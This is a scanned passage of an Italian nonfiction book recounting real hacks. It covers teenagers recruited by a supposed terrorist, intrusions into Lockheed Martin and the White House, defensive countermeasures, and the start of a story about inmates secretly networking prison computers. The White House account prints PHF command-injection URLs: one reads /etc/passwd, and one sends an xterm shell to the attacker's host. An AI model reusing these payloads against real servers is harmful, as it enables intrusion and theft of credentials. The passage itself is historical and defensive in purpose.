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que milioni di dollari in contanti se avessi hackerato il “Sentry” 
— il sistema informatico dell'Ufficio federale delle prigioni — e l'a- 
vessi liberato. L'uomo era credibile e assolutamente serio. Decli- 
nai l'offerta, ma diedi l'impressione che l'avrei aiutato comunque 
onde evitare qualsiasi conflitto. Mi chiedo cosa avrebbe fatto ne0h 
in una situazione simile. 

I nostri nemici potrebbero addestrare i loro soldati nell'arte 
della cyber-guerriglia per attaccare la nostra infrastruttura e di- 
fendere la loro. Sembra del tutto ovvio che questi gruppi reclu- 
terebbero anche degli hacker di valore di qualsiasi parte del mon- 
do per l'addestramento e per delle missioni cruciali. 

Nel 1997 e nel 2003, il Dipartimento della difesa lanciò l’o- 
perazione “Eligible Receiver”, uno sforzo per testare la vulnera- 
bilità della nazione agli attacchi elettronici. Secondo un reso- 
conto pubblicato dal “Washington Times”,!° sulla prima di que- 
ste operazioni, “i capi del Pentagono sono rimasti scioccati da 
un'esercitazione militare che ha dimostrato quanto sia facile per 
gli hacker paralizzare le reti telematiche militari e civili degli Sta- 
ti Uniti”. L'articolo continua spiegando che la National Security 
Agency aveva creato un gruppo di suoi specialisti informatici per 
formare una “squadra rossa” di hacker, cui era permesso utiliz- 
zare esclusivamente computer venduti al dettaglio al pubblico e 
qualsiasi strumento di hacking, compreso il codice degli exploit, 
che potevano scaricare da Internet o da bollettini elettronici. 

Nel giro di pochi giorni gli hacker della squadra rossa aveva- 
no penetrato i sistemi informatici assumendo il controllo di al- 
cune parti della griglia elettrica della nazione e con una serie di 
comandi avrebbero potuto oscurare intere sezioni del paese. “Se 
l'esercitazione fosse stata reale,” scriveva il “Christian Science 
Monitor”, “avrebbero potuto disattivare i sistemi di comunica- 
zione del Dipartimento della difesa (tagliando fuori gran parte 
del Comando del Pacifico) e guadagnarsi l’accesso ai sistemi infor- 
matici a bordo degli incrociatori della marina americana.”!? 

Per quel che riguarda la mia esperienza personale, io riuscii 
ad aggirare i dispositivi di sicurezza usati da diverse Baby 
Bells!8 per controllare l’accesso ai commutatori delle linee te- 
lefoniche. Circa dieci anni fa, avevo il controllo completo della 
maggior parte dei commutatori gestiti da Pacific Bells, Sprint, 


16 “Computer hackers could disable Military; System Compromised in Se- 
cret Exercise”, di Bill Gertz, “Washington Times”, 16 aprile 1998. 

!7 “Wars of the Future... Today”, di Tom Regan, Christian Science Monitor, 
24 giugno 1999. 

18 Le sette compagnie telefoniche regionali create nel 1984 dal governo fe- 
derale, quando AT&T fu costretta a lasciare i suoi servizi di telefonia locali per 
far spazio alla concorrenza. [N.d.T] 
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Gte e altri. Immaginate il caos che un gruppo terrorista ben equi- 
paggiato avrebbe potuto gettare con lo stesso livello di accesso. 

I membri di Al Qaeda e di altri gruppi terroristi hanno usato 
più volte le reti telematiche per pianificare attacchi terroristici. Ci 
sono prove che indicano un qualche uso di Internet nella pianifi- 
cazione delle loro operazioni per gli attacchi dell’11 settembre. 

Se anche Khalid Ibrahim fosse riuscito a ottenere le infor- 
mazioni attraverso uno dei giovani hacker, nessuno al momento 
lo ammette. Né esistono prove inoppugnabili che sia stato effet- 
tivamente legato agli attacchi al World Trade Center e al Penta- 
gono. Eppure nessuno sa se lui o uno come lui ricomparirà nel 
cyberspazio, alla ricerca di aiutanti ingenui che provano il brivi- 
do di “fare cose che non dovresti fare, andare in posti dove non 
dovresti andare”. Ragazzini che possono pensare che la sfida che 
viene offerta loro sia qualcosa di “fico”. 

Per i giovani hacker, una sicurezza debole rimane un invito 
continuo. Eppure gli hacker in questa storia avrebbero dovuto ri- 
conoscere il pericolo di uno straniero che li reclutava per com- 
promettere le reti telematiche sensibili degli Stati Uniti. Mi devo 
chiedere quanti altri ne0h siano stati reclutati dai nostri nemici. 

Una buona sicurezza non è mai stata così importante, in un 
mondo popolato da terroristi. 


Riflessioni 


ne0h ci ha fornito dei dettagli sul modo in cui ha hackerato 
il sistema informatico della Lockeed Martin. La storia testimo- 
nia la capacità d'innovazione degli hacker (“se c'è una falla nella 
sicurezza, la troveremo” potrebbe essere il loro motto) e il rac- 
conto cautelativo per ogni organizzazione. 

ne0h capì rapidamente che la stessa Lockeed Martin stava ge- 
stendo i suoi Domain Name Server. Il Dns è naturalmente il pro- 
tocollo Internet che, per esempio, traduce (“risolve”) www.di- 
sney.com in 198.187.189.55, un indirizzo che può essere utiliz- 
zato per instradare dei pacchetti di dati. neOh sapeva che un grup- 
po di ricerca polacco aveva pubblicato quello che gli hacker chia- 
mano un “exploit” - un programma realizzato specificamente per 
attaccare un punto vulnerabile preciso — per sfruttare una debo- 
lezza della versione del Dns che la Lockeed stava impiegando. 

La compagnia stava utilizzando un'implementazione dei pro- 
tocolli Dns chiamata Bind (Berkeley Internet Name Domain). Il 
gruppo polacco aveva scoperto che quella versione del Bind era 
suscettibile a un tipo di attacco basato su un “buffer overflow re- 
moto”! e che quella versione era quella usata alla Lockeed Mar- 


19 Tecnica usata dagli hacker per sommergere (overflow) di richieste un pro- 
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tin. Seguendo il metodo che aveva scoperto online, ne0h era sta- 
to in grado di guadagnarsi i privilegi (amministrativi) di root sia 
sui server Dns primari sia secondari della Lockeed. 

Dopo aver ottenuto la root, ne0h era riuscito a intercettare 
password e e-mail installando uno sniffer, un programma che si 
comporta come uno spione informatico. Qualsiasi traffico che 
scorre lungo quella linea viene registrato di nascosto; l’hacker di 
solito invia i dati che devono essere archiviati in un posto dove è 
improbabile che vengano notati. ne0h racconta che per nascon- 
dere le tracce dello sniffer creò una directory con un nome che 
era un semplice spazio rappresentato da tre punti; il percorso che 
usò fu “/var/adm/ ...”. A una rapida ispezione, un amministrato- 
re di sistema potrebbe non accorgersi dell’innocuo frammento di 
informazione. 

Questa tecnica per nascondere lo sniffer, pur essendo effica- 
ce in molte situazioni, è piuttosto semplice; esistono dei metodi 
molto più sofisticati per nascondere le tracce di un hacker in una 
situazione come questa. 

Prima di riuscire a scoprire se fosse stato in grado di penetrare 
ulteriormente nella rete della Lockeed Martin per ottenere infor- 
mazioni confidenziali della compagnia, ne0h fu distratto da un al- 
tro lavoro. I file risevati della Lockeed Martin rimasero al sicuro. 

Per hack della Casa Bianca, Zyklon dice che inizialmente 
lanciò un programma chiamato Scanner Cgi, che scansiona il si- 
stema scelto come obiettivo alla ricerca di vulnerabilità nel Cgi.20 
Scoprì che il sito web poteva essere attaccato sfruttando “Yexploit 
Phf”, che trae vantaggio dall’errore di un programmatore grazie 
allo sviluppatore dello script Phf (elenco telefonico). 

Il Phf è un'interfaccia basata su un form che accetta un nome 
come input e cerca il nome e l'indirizzo a esso associato sul server. 
Lo script richiamava una funzione chiamata escape_shell_cmd(), 
che doveva in teoria pulire l'immissione di qualsiasi carattere spe- 
ciale. Ma il programmatore aveva dimenticato un carattere nel suo 
elenco: ilnewline, il carattere dell’accapo. Un intruso esperto avreb- 
be potuto sfruttare questa svista immettendo nel form la versione 
codificata (0x0a) del carattere newline. Inviando una stringa con- 
tenente questo carattere si inganna lo script facendogli eseguire 
qualsiasi comando l’intruso scelga. 

Zyklon inserì nel suo browser la Url: 


gramma, che non essendo più in grado di allocarle nello spazio di memoria tem- 
poranea (il buffer) a esse destinato, finisce per bloccarsi. In quel momento l’hacker 
può assumere il controllo del programma e del sistema su cui gira. [N.d.7.] 

2° TI Cgi, Common Gateway Interface, è un programma o uno script per la 
gestione dinamica da parte di un web server di richieste e dati immessi dagli uten- 
ti, come la compilazione di form e via dicendo. [N.d.7.] 
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http:/www.whitehouse.gov/cgi- 
bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd 


Con questo, riuscì a vedere il file contenente la password per 
whitehouse.gov. Ma voleva ottenere il controllo pieno del web ser- 
ver della Casa Bianca. Sapeva che era altamente probabile che le 
porte del X Server?! sarebbero state bloccate dal firewall, che gli 
avrebbe impedito di connettersi a uno qualsiasi di quei servizi su 
whitehouse.gov. Così invece, sfruttò nuovamente il baco del Phf 
immettendo la stringa 


http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/usr/ 
X11Ré6/bin/xterm%20-ut%20-display%20zyklons.ip.address:0.0 


Questa provocò l'invio di un xterm?” dal server della Casa 
Bianca a un computer sotto il suo controllo che gestiva un X ser- 
ver. Il che significa che invece di connettersi a whitehouse.gov, di 
fatto stava comandando al sistema della Casa Bianca di connet- 
terlo a lui. (Questo è possibile solo quando il firewall consente 
delle connessioni in uscita, il che era apparentemente possibile 
in questo caso.) 

Quindi sfruttò una vulnerabilità di buffer overflow nel pro- 
gramma del sistema, chiamata ufsrestore. E questo, dice Zyklon, 
gli permise di guadagnarsi l’accesso di root a whitehouse.gov, co- 
me l’accesso al mail server della Casa Bianca e ad altri sistemi del 
network. 


Contromisure 


Gli exploit di ne0h e Comrade appena descritti sollevano due 
questioni per tutte le aziende. 

La prima è semplice e familiare: informatevi sempre su tutti 
gli ultimi aggiornamenti dei vostri fornitori per i sistemi opera- 


21 Il X Server fa parte del sistema X Window (da non confondere con il si- 
stema operativo Windows della Microsoft), un protocollo standard sviluppato dal 
Massachusetts Institute of Technology nel 1984 per la costruzione di interfacce 
grafiche nei sistemi basati su Unix. Tali interfacce variano a seconda dei pro- 
grammi usati dagli utenti (client) per visualizzarle. Tuttavia, in X Window, la mac- 
china in cui vengono lanciate le applicazioni non è la macchina locale dell’uten- 
te. Al contrario di quanto ci si potrebbe aspettare, il server e il client sono inver- 
titi: il server corrisponde al display locale dell'utente, anziché la macchina re- 
mota. [N.d.T] 

22 Il xterm è l'emulatore standard del terminale nel sistema X Window. Un 
utente può richiamare molti xterm simultaneamente sullo stesso display, ognu- 
no dei quali fornisce un input/output diverso per il processo che sta gestendo. 
[N.d.T] 
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tivi e per le applicazioni. È essenziale esercitarsi a essere vigili 
nel mantenersi aggiornati e nell’installare le patch e le riparazioni 
legate alla sicurezza. Per essere sicuri che questo non sia fatto in 
modo occasionale, tutte le compagnie dovrebbero sviluppare e 
implementare un programma di gestione delle patch, con lo sco- 
po di mettere in allerta il personale preposto ogni volta che vie- 
ne pubblicata una nuova patch per i prodotti usati da una com- 
pagnia: il software per il sistema operativo in particolare, ma an- 
che il software e il firmware per le applicazioni. 

E quando una nuova patch diviene disponibile, deve essere 
installata il prima possibile: immediatamente, a meno che que- 
sto non interrompa le operazioni della corporation, altrimenti 
nel primo momento disponibile praticamente. Non è difficile ca- 
pire gli impiegati sovraccarichi di lavoro che cedono alla pres- 
sione di concentrarsi su progetti altamente visibili (installare i si- 
stemi per i nuovi lavoratori, per fare solo un esempio) e che evi- 
tano di installare patch nel tempo disponibile. Ma se lo strumento 
non riparato è pubblicamente accessibile da Internet, la situa- 
zione si fa molto rischiosa. 

Molti sistemi vengono compromessi a causa di un'assenza di 
gestione delle patch. Una volta che una vulnerabilità viene resa 
pubblica, l'arco temporale d'esposizione aumenta significativa- 
mente finché il fornitore non rilascia una patch che risolve il pro- 
blema e i clienti non la installano. 

La vostra organizzazione deve fare dell’installazione delle 
patch un'alta priorità, con un processo di gestione formale che 
riduca l'arco temporale d'esposizione il più rapidamente possi- 
bile. Un processo che è secondo solo alla necessità di non inter- 
ferire con operazioni di business fondamentali. 

Ma anche il vigilare sull’installazione delle patch non è suffi- 
ciente. ne0h dice che alcune delle intrusioni cui ha partecipato 
furono possibili attraverso l’uso di exploit da “giorno zero”, un’in- 
trusione basata su una vulnerabilità che non è nota al di fuori di 
una confraternita ristretta di hacker. Il “giorno zero” è il giorno 
in cui gli hacker attaccano il punto debole per la prima volta e 
quindi il giorno in cui il fornitore del software e la comunità de- 
gli esperti di sicurezza ne vengono a conoscenza. 

Poiché c'è sempre il rischio di essere compromessi da un ex- 
ploit da giorno zero, tutte le organizzazioni che usano un pro- 
dotto bacato sono vulnerabili finché non viene distribuita una 
patch o una soluzione provvisoria. Come si può quindi mitigare 
il rischio d'esposizione? 

Sono convinto che l’unica soluzione percorribile risieda nel- 
l’uso di un modello di “difesa approfondita”. Dobbiamo dare per 
scontato che i nostri sistemi informatici accessibili al pubblico 
diverranno prima o poi vulnerabili a un giorno zero. Per questo, 
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dovremmo creare un ambiente che minimizzi i danni potenzia- 
li che potrebbero essere prodotti da un malintenzionato. Un 
esempio, già citato in precedenza, è di mettere i sistemi pubbli- 
camente accessibili sul “Dmz” del firewall della società. Il ter- 
mine Dmz, preso in prestito dall’abbreviazione politica/militare 
di “zona demilitarizzata”, si riferisce all’installazione di uwar- 
chitettura di rete fatta in modo che i sistemi accessibili al pub- 
blico (server web, di posta, Dns e altri simili) vengano isolati dai 
sistemi sensibili sulla rete locale della corporation. Organizzare 
un'architettura di rete che protegge la rete interna è un esempio 
di “difesa in profondità”. 

Con questo accorgimento, anche se un hacker scopre una vul- 
nerabilità sconosciuta in precedenza e un server web o di posta 
viene compromesso, i sistemi della corporation rimangono pro- 
tetti da un altro livello di sicurezza. 

Le compagnie possono prendere un’altra misura precauzio- 
nale efficace monitorando il network o i singoli host alla ricerca 
di attività che appaiono inusuali o sospette. Una volta che è riu- 
scito a compromettere il sistema, l’intruso compie di solito una 
serie di azioni quali il cercare di ottenere password in chiaro, in- 
stallare una backdoor, modificare i file di configurazione per in- 
debolire la sicurezza o, tra le altre cose, modificare un sistema, 
un'applicazione o i file di log. 

Avere una procedura che monitora questo genere di com- 
portamenti tipici degli hacker e mette in allerta il personale pre- 
posto può servire a limitare i danni. 

Cambiando argomento, sono stato intervistato innumerevo- 
li volte dalla stampa sul modo migliore per proteggere le azien- 
de e i personal computer dei privati nell'ambiente ostile di oggi. 
Una delle mie raccomandazioni è di usare forme di autentica- 
zione più forti delle password statiche. Non si può mai sapere 
quando qualcuno scopre la vostra password, a eccezione forse di 
quando il fatto si è verificato. 

Sono inoltre disponibili diverse tecniche di autenticazione di 
secondo livello che vanno usate in combinazione con una pass- 
word tradizionale per fornire un livello di sicurezza molto più al- 
to. In aggiunta al sopraccitato SecureID del Rsa, Safeword Pre- 
mierAccess offre degli attestati generatori di codici, certificati di- . 
gitali, smart card, biometria e altre tecniche. 

Gli inconvenienti nell'usare questo tipo di controlli di au- 
tenticazione risiedono nei costi aggiuntivi e nel livello extra di 
scomodità per il singolo utente. Dipende tutto da quello che cer- 
cate di proteggere. Le password statiche possono essere suffi- 
cienti per proteggere gli articoli del sito web del “Los Angeles Ti- 
mes”. Ma ci si può affidare a password statiche per proteggere 
le ultime specifiche tecniche di progettazione di un nuovo jet 
commerciale? 
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Conclusioni 


Le storie di questo libro, così come quelle raccolte dalla stam- 
pa, dimostrano l’insicurezza dei sistemi informatici di questa na- 
zione e quanto siamo esposti a un attacco. Sembra che pochi si- 
stemi siano veramente sicuri. 

Nell’epoca del terrorismo, abbiamo chiaramente bisogno di 
lavorare non limitandoci al rattoppare falle. Episodi come quel- 
lo raccontato in questo capitolo pongono una questione che dob- 
biamo affrontare: la facilità con cui il talento e la conoscenza dei 
nostri ragazzi poco sagaci possono essere manipolati per mette- 

‘re in pericolo la nostra società. Credo che i principi dell'etica del 
computer dovrebbero essere insegnati ai bambini delle scuole sin 
dal primo momento in cui vengono introdotti all'informatica al- 
le elementari. 

Di recente ho seguito una presentazione di Frank Abagnale, 
il protagonista del film campione d'incassi Prova a prendermi. 
Frank aveva condotto un sondaggio tra gli studenti delle supe- 
riori in diverse parti del paese sull’etica nell'uso dei computer. A 
ogni studente e studentessa era stato chiesto se considerava un 
comportamento accettabile il craccare la password di un com- 
pagno di scuola. A sorpresa, il 48 percento degli studenti intervi- 
stati aveva risposto di non considerarlo un problema. Con orien- 
tamenti di questo genere, non è difficile capire perché le perso- 
ne si lascino coinvolgere in questo genere di attività. 

Se qualcuno ha un suggerimento su come rendere i nostri 
giovani hacker meno pronti a essere reclutati dai nostri nemici, 
stranieri o interni che siano, spero che prenda la parola e diffon- 
da le sue idee. 
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3. 


L'hack della prigione texana 


Non credo si possa dire alcunché ai giovani per 
farli cambiare, se non di credere in se stessi e di 
non prendere mai delle scorciatoie. 

William 


Due giovani prigionieri, che scontano entrambi delle lunghe 
pene per omicidio, si incontrano in una luminosa giornata nel cor- 
tile di cemento di una prigione del Texas e scoprono di condivide- 
re la passione per i computer. Si associano e diventano segreta- 
mente degli hacker, sotto ai nasi delle guardie che li controllano. 

Tutto questo nel passato. Oggi William Butler sale in mac- 
china tutte le mattine della seitimana lavorativa alle 5,30 e inizia 
la sua giornata da pendolare nel traffico ingolfato di Houston. Si 
considera un uomo molto fortunato solo per il fatto di essere an- 
cora vivo. Ha una ragazza fissa, guida una macchina nuova fiam- . 
mante. E aggiunge: “Sono stato ricompensato da poco con un au- 
mento di settemila dollari. Niente male”. 

Come William, anche il suo amico Danny si è trovato una 
sistemazione nella vita e svolge un lavoro fisso da informatico. 
Ma nessuno dei due dimenticherà mai i lunghi e lenti anni in 
cui hanno pagato un duro prezzo per le loro azioni. Strana- 
mente, il tempo passato in prigione ha fornito loro un bagaglio 
di competenze di cui ora stanno facendo un ottimo uso nel “mon- 
do libero”. 


Gli anni dentro: scoprire i computer 


La prigione è uno shock per i nuovi arrivi. Inuovi compagni 
di cella vengono spesso lasciati soli finché l’insubordinazione e 
la violenza non vengono risolte: una sfida molto dura per quelli 
che cercano di vivere secondo le regole. Circondati da persone 
che possono esplodere per qualsiasi contrasto immaginabile, an- 
che i più docili devono mostrarsi duri e difendersi da sé. William 
aveva stabilito il suo sistema di regole: 
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Di fatto vivevo nel modo in cui si deve vivere lì. Sono alto solo un 
metro e settantacinque, e pesavo circa centoquindici chili. Ma non 
era una questione solo di essere grossi, è un'attitudine mentale il fat- 
to che non ero una persona debole e non ero uno di cui ci si poteva 
approfittare. Mi comportavo in quel modo. Dentro, se qualcuno per- 
cepisce una qualsiasi debolezza, cerca di trarne dei vantaggi. Non 
mentivo, non parlavo degli affari degli altri e non chiedermi degli 
affari miei perché ti avrei risposto fottiti. 

Danny e io avevamo entrambi passato del tempo in settori duri. Sai 
di cosa sto parlando, i settori dei gladiatori, quelli in cui devi fare a 
botte tutto il tempo. Così non ce ne fregava niente delle guardie né 
di nessuno. Ci battevamo al primo battito di ali e facevamo quello 
che bisognava fare. 


Quando Danny fu trasferito alla sezione di Wynne, fu ben con- 
tento di fare un lavoro impiegatizio all'Ufficio trasporti. ‘Iniziai 
a lavorare su una macchina da scrivere Olivetti con un monitor 
e un paio di dischi rigidi. Girava su Dos e aveva poca memoria. 
Smanettavo cercando di imparare a usarla.” (La cosa mi ha riat- 
tivato dei ricordi familiari: il primo computer che ho usato era 
una telescrivente Olivetti dotata di un modem accoppiatore acu- 
stico a 110-baud.) 

Danny trovò in giro un vecchio libro d'informatica, un ma- 
nuale di istruzioni per uno dei primi programmi per database, il 
dBase m. “Trovai il modo per inserire i resoconti nel dBase, men- 
tre tutti gli altri battevano ancora i loro a macchina.” Convertiva 
gli ordini d'acquisto dell’ufficio nel dBase e lanciò persino un pro- 
gramma per tracciare le spedizioni dei prodotti agricoli della pri- 
gione ad altre carceri dello stato. 

Alla fine Danny ottenne lo status di fiduciario; questo gli portò 
in affidamento un lavoro che implicava un più alto livello di fi- 
ducia, nonché quello che viene definito il “pass del cancello”, cioè 
l'autorizzazione a lavorare all’esterno del perimetro sorvegliato 
della prigione. Fu inviato a lavorare all’ufficio consegne in un 
container fuori dalla recinzione, a preparare ordini di spedizio- 
ne per i camion che trasportavano beni alimentari. Ma ciò che è 
veramente importante è che il lavoro gli diede il suo “primo ac- 
cesso vero ai computer”. 

Dopo un po’ di tempo, gli fu data una stanzetta nel container 
e venne incaricato di gestire hardware, cioè l'assemblaggio di 
nuove macchine e la riparazione di quelle rotte. Era un’opportu- 
nità d’oro: imparare come costruire e riparare computer facen- 
do esperienza diretta. Alcune delle persone con cui lavorava gli 
portavano dei libri di informatica, il che velocizzò il suo proces- 
so di apprendimento. 

L'incarico della gestione del hardware gli permise di accede- 
re a “uno scaffale pieno di componenti per computer che non era- 
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no inventariati”. Divenne presto piuttosto esperto nell’assem- 
blaggio delle macchine e nell’aggiunta dei componenti. Il perso- 
nale della prigione non ispezionava neanche i sistemi per accer- 
tare il modo in cui li aveva configurati. Così poteva facilmente 
installare nelle macchine componenti non autorizzati. 


Le prigioni federali sono diverse 


Questa sorta di incauta disattenzione nei confronti delle at- 
tività di un prigioniero è impensabile in una prigione federale. 
L'Ufficio delle prigioni degli Stati Uniti ha un livello di paranoia 
notevolmente alto sull'argomento. Quando mi trovavo dentro, 
avevo un divieto che diceva “No Computer”, il che significava che 
il mio accesso a un computer qualsiasi era considerato una mi- 
naccia per la sicurezza. Mi era persino vietato l’uso del telefono: 
un pubblico ministero una volta disse a un magistrato federale 
che se fossi stato lasciato libero di usare un telefono mentre mi 
trovavo in carcere, sarei stato capace di fischiarci dentro e di in- 
viare istruzioni a un missile intercontinentale dell'aeronautica. 
Assurdo, ma il giudice non aveva motivo di non crederci. Fui te- 
nuto in isolamento per otto mesi. 

All'epoca nel sistema federale, i prigionieri potevano accede- 
re ai computer solo rispettando un insieme molto severo di di- 
rettive. Nessun detenuto poteva usare un computer collegato a 
un modem o che avesse una scheda di rete collegata ad altri stru- 
menti di comunicazione. I computer e i sistemi fondamentali da 
un punto di vista operativo, contenenti delle informazioni criti- 
che, erano contrassegnati chiaramente con l'indicazione “solo a 
uso del personale”. Così sarebbe stato immediatamente eviden- 
te se un detenuto avesse usato un computer che metteva a rischio 
la sicurezza. La componentistica hardware era strettamente con- 
trollata da un personale tecnologicamente esperto per prevenir- 
ne un uso non autorizzato. 


William ottiene le chiavi del castello 


Quando William fu trasferito dalla prigione-fattoria alla se- 
zione di Wynne a Huntsville, ottenne un lavoro invidiabile in cu- 
cina. “Avevo le chiavi del castello perché potevo scambiare il ci- 
bo con altre cose.” 

La cucina aveva un solo computer, un vecchio 286 con una 
ventola di raffreddamento montata sulla parte anteriore, ma co- 
munque sufficiente a permettergli di fare altri progressi con 
l'informatica. Riusciva a inserire nel computer alcune registra- 
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zioni, rendiconti e ordini di acquisto della cucina, il che gli ri- 
sparmiava ore di lavoro che avrebbe altrimenti speso a somma- 
re colonne di numeri e a battere a macchina la contabilità. 

Dopo che William ebbe scoperto che un altro prigioniero con- 
divideva il suo stesso interesse per i computer, Danny poté aiu- 
tarlo a migliorare la qualità della configurazione delle macchine 
al commissariato. Prese dei componenti dagli scaffali nel con- 
tainer dell'agricoltura e poi reclutò alcuni amici che avevano com- 
piti di manutenzione, i quali potevano entrare in qualsiasi parte 
della prigione: 


Non dovevano rispondere a nessuno. Così ci facevano arrivare di na- 
scosto i componenti in cucina, mettendoli semplicemente in un car- 
rello e facendolo passare. 

Poi la sera di una vigilia di Natale, una guardia entrò nella nostra 
sezione con una scatola che conteneva i pezzi di un intero compu- 
ter, un hub e altre cose. 


Come riuscirono a convincere una guardia a infrangere le re- 
gole così apertamente? “Gli avevo semplicemente ‘spalmato la 
mia gelatina addosso’, come si suol dire: gli avevo parlato e me 
l’ero fatto amico.” I genitori di William avevano acquistato i com- 
ponenti del computer su sua richiesta e la guardia aveva accon- 
sentito a portare dentro il carico dei prodotti come se fossero dei 
regali di Natale. 

Per creare uno spazio di lavoro per la sua installazione infor- 
matica in costante espansione, William si appropriò di una stan- 

| zetta adiacente al commissariato. La stanza era priva di ventila- 
zione, ma lui era sicuro che non sarebbe stato un problema. E non 
lo fu: “Scambiai del cibo con un climatizzatore, aprimmo un bu- 
co nel muro e ci infilammo il condizionatore dentro in modo tale 
che potevamo respirare e lavorare in tutta comodità”, spiega. 

“Lì costruimmo tre personal computer. Prendemmo i case dei 
vecchi 286 e ci infilammo dentro delle schede per Pentium. I di- 
schi rigidi non c'entravano, così dovemmo usare dei rotoli di car- 
ta igienica per fissarli,” una cosa che pur essendo una soluzione 
innovativa, doveva essere curiosa a vedersi. 

Perché tre computer? Danny si faceva vivo di tanto in tanto 
e ognuno di loro avrebbe avuto una macchina da usare. Un ter- 
zo uomo avviò più tardi un “ufficio legale”, con cui faceva paga- 
re i detenuti per effettuare delle ricerche online sui loro proble- 
mi legali e per compilargli delle carte per i ricorsi in appello e via 
dicendo. 

Nel frattempo, la capacità di William nell’utilizzare il com- 
puter saltò all'attenzione del capitano incaricato dei servizi ali- 
mentari. Il quale diede a William un compito aggiuntivo: quan- 


75 


do non era impegnato con le attività ordinarie, avrebbe lavorato 
su dei file per i rapporti del capitano al direttore della prigione. 

Per adempiere a queste responsabilità aggiuntive, a William 
fu permesso di lavorare nell'ufficio del capitano, un compito lu- 
singhiero per un prigioniero. Ma dopo un po’ di tempo, William 
iniziò ad abusare della sua posizione. I computer del commissa- 
riato erano ormai pieni di file musicali, giochi e video. Ma nel- 
l'ufficio del capitano William non aveva nessuno di questi piace- 
voli diversivi. Il buon vecchio senso americano dell'innovazione, 
unito a una salutare dose di coraggio e spavalderia, gli suggeri- 
rono un modo di risolvere il problema: 


Scambiai del cibo dalla cucina con un cavo di rete dal reparto ma- 
nutenzione. Riuscimmo a farci ordinare dall’addetto alla manuten- 
zione una spoletta da circa trecento metri di cavo [Ethernet] Cat 5. 
Le guardie ci aprirono delle cavità per le canaline in cui fecero scor- 
rere il cavo. Avevo detto loro semplicemente che stavo lavorando per 
il capitano e mi aprirono la porta. 


In poco tempo, creò un cablaggio Ethernet collegando le tre 
macchine che aveva nel commissariato con il computer nell’uf- 
ficio del capitano. Quando il capitano non era in sede, William 
se la spassava a giocare al computer, ascoltare musica e guarda- 
re video. 

Ma stava correndo un grosso rischio. Che cosa sarebbe acca- 
duto se il capitano fosse tornato all'improvviso e lo avesse trova- 
to con la musica accesa, un gioco sullo schermo o un film con 
donne nude? Avrebbe dovuto dire addio alla posizione di privile- 
gio che aveva in cucina, ai compiti comodi nell’ufficio del capi- 
tano e alla disponibilità dei computer che aveva assemblato in 
modo così diligente. 

Nel frattempo, anche Danny aveva il suo bel da fare. Ora sta- 
va lavorando nell'ufficio agricoltura, circondato da computer, con 
prese telefoniche ovunque che lo collegavano al mondo esterno. 
Fra come un bambino senza soldi in tasca e con il naso schiacciato 
contro la vetrina di un negozio di caramelle. Tutte queste tenta- 
zioni così a portata di mano, ma senza la possibilità di godersele. 

Un giorno nel piccolo ufficio di Danny arrivò un funziona- 
rio: “Mi portò la sua macchina perché non riusciva a collegarsi 
a Internet. Non sapevo veramente come funzionasse un modem, 
non c'era nessuno che mi insegnava niente. Ma riuscii a dargli 
una mano a installarlo”. Mentre mettevano la macchina online, 
il funzionario, su richiesta di Danny, gli diede il suo nome uten- 
te e password; probabilmente non pensò che vi fosse alcun pro- 
blema, pur sapendo che ai detenuti non era permesso di usare 
nessun computer collegato online. 
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In questo modo, Danny ottenne quello che la guardia era trop- 
po lenta o troppo ignorante per capire: aveva dato a Danny un 
biglietto elettronico per Internet. Facendo correre di nascosto un 
cavo telefonico dietro a un filare di armadi fino alla sua zona di 
lavoro, Danny lo inserì nel modem interno del suo computer. Con 
il log-in e la password del funzionario che aveva memorizzato, 
era raggiante: ora aveva l’accesso a Internet. 


Online in modo sicuro 


Per Danny, la conquista di una connessione a Internet gli 
schiuse un intero mondo nuovo sul monitor. Ma come William, 
correva un grosso rischio ogni volta che andava online: 


Potevo collegarmi, prendere informazioni sui computer e altre co- 
se, e fare delle domande. Entravo con l'account del funzionario ma 
ero sempre preoccupato di essere scoperto. Cercavo di stare atten- 
to a non tenere troppo a lungo occupate le linee. 


Una soluzione astuta si offrì da sola. Danny installò uno “split- 
ter” sulla linea telefonica che andava al fax. Ma non molto tem- 
po dopo il settore agricoltura iniziò a ricevere delle lamentele dal- 
le altre prigioni: volevano sapere perché la linea del fax era qua- 
si sempre occupata. Danny capì che avrebbe dovuto avere una li- 
nea dedicata se voleva navigare con comodo e in tranquillità. Una 
breve ricerca gli diede la soluzione. Scoprì due prese del telefo- 
no che erano attive ma non in uso. Apparentemente nessuno del 
personale ne ricordava l’esistenza. Ricollegò il cavo proveniente 
dal suo modem, infilandolo questa volta in una delle prese. Ora 
aveva la sua linea esterna personale. Un altro problema risolto. 

In un angolo della sua stanzetta, sotto una pila di scatole, in- 
stallò un server, cioè uno strumento di archiviazione elettronica 
per tutte le fantastiche cose che aveva in mente, in modo che i fi- 
le musicali, le istruzioni per hackerare e tutto il resto non sareb- 
bero rimasti sul suo computer, nel caso qualcuno vi avesse dato 
un'occhiata. 

Le cose stavano prendendo forma, ma Danny era afflitto da 
un altro problema, ben più grande. Non aveva modo di capire 
che cosa sarebbe accaduto se lui e il funzionario avessero usato 
lo stesso account nello stesso momento. Se Danny era già colle- 
gato, il funzionario avrebbe visualizzato un messaggio di errore 
che diceva che non poteva andare online perché il suo account 
era già in uso? Luomo poteva anche essere un provinciale ottu- 
so ma sicuramente in quel momento si sarebbe ricordato di aver 
dato a Danny le sue informazioni per entrare in Rete e avrebbe 
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iniziato a interrogarsi. In quel momento, Danny non sapeva tro- 
vare una soluzione; il problema lo affliggeva. 

Eppure, era fiero di quello che era riuscito a fare, date le cir- 
costanze. Gli ci era voluta un'enorme quantità di lavoro: “Avevo co- 
struito una buona base: sapevo gestire dei server, scaricare qual- 
siasi cosa trovavo sul web, usare [il software] GetRight che mi te- 
neva attivo il download ventiquattr'ore di seguito. E poi scaricavo 
giochi, video, informazioni sull’hacking, e imparavo come sono 
configurate le reti, le vulnerabilità e come trovare le porte aperte”. 

William capì ciò che aveva reso possibile l'installazione di 
Danny nel dipartimento dell'Agricoltura: “Di fatto, lui era Pam- 
ministratore di rete perché l’uomo libero [il dipendente civile] 
che avevano assunto a lavorare era un buffone”. Ai detenuti ve- 
nivano assegnati lavori che sarebbero spettati al dipendente, ma 
che non sapeva svolgere, tipo “la programmazione in C++ e in Vi- 
sual Basic”, né aveva le capacità necessarie ad amministrare la 
rete in modo appropriato. 

C'era anche un'altra questione che creava problemi a Danny: 
il suo computer dava su un corridoio, così chiunque poteva ve- 
dere quello che stava facendo. Poiché ufficio agricoltura era chiu- 
